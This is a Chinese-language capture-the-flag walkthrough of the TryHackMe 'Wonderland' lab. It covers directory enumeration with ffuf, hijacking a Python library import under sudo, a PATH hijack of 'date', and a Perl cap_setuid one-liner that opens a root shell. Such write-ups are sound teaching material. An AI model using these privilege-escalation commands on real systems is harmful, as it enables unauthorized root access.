tryhackem_wonderland

涉及，解密，扫描，横向移动，纵向移动

仙境

掉进兔子洞，进入仙境。

获得shell

解法一:

目录扫描

ffuf -u http://10.10.134.189/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -c
ffuf -u http://10.10.134.189/r/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -c -r
ffuf -u http://10.10.134.189/r/a/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -c -r
ffuf -u http://10.10.134.189/r/a/b/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -c -r
ffuf -u http://10.10.134.189/r/a/b/b/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -c -r
ffuf -u http://10.10.134.189/r/a/b/b/i/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -c -r
ffuf -u http://10.10.134.189/r/a/b/b/i/t/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -c -r

然后查看源码，会发现一个依据。

解法二：

查看源码时会发现/img目录，进入之后

然后主页也是

跟着白色走

可能会产生疑问，但是当你扫一次目录后明白了

shell提权

alice

当你ls发现目录下为root.txt时，就会知道这并不简单，根据提示这里的一切都是颠倒的。

很容易想到cat /root/user.txt
thm{"Curiouser and curiouser!"}

find虽然啥也没找到，但是sudo -l找到一个

查看python文件会发现使用了random库，ok
捏造一个
echo 'import os;os.system("/bin/bash")' > random.py
chmod +x random.py
sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py

此时就来到了

rabbit

cat 查看

Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by Sat, 08 Apr 2023 07:54:53 +0000
Ask very nicely, and I will give you some tea while you wait for him

很明显用到了date，此时只需修改PATH，伪造一个date即可提权

咳咳，之前的笔记：https://www.cnblogs.com/-Lucky-/p/17195932.html

执行即可

此时来到了

hatter

发现密码

尝试使用此密码 ssh 为我们提供一个完整的 shell 作为用户hatter

接下来就嘎了

getcap -r / 2>/dev/null 命令用于递归地查找整个文件系统上所有带有特殊权限的文件，并将其输出到标准输出中。

/usr/bin/perl5.26.1 文件是 Perl 语言的解释器程序。cap_setuid+ep 是它的安全标志，其中 ep 表示可执行程序具有特权执行（privileged execution）权限，即在执行该程序时，进程的执行者可以提升自己的特权等级，而 cap_setuid 表示程序具有设置用户 ID 权限（setuid）的能力。

很幸运地在：https://gtfobins.github.io/gtfobins/perl/

找到了利用方法

/usr/bin/perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'

此时为root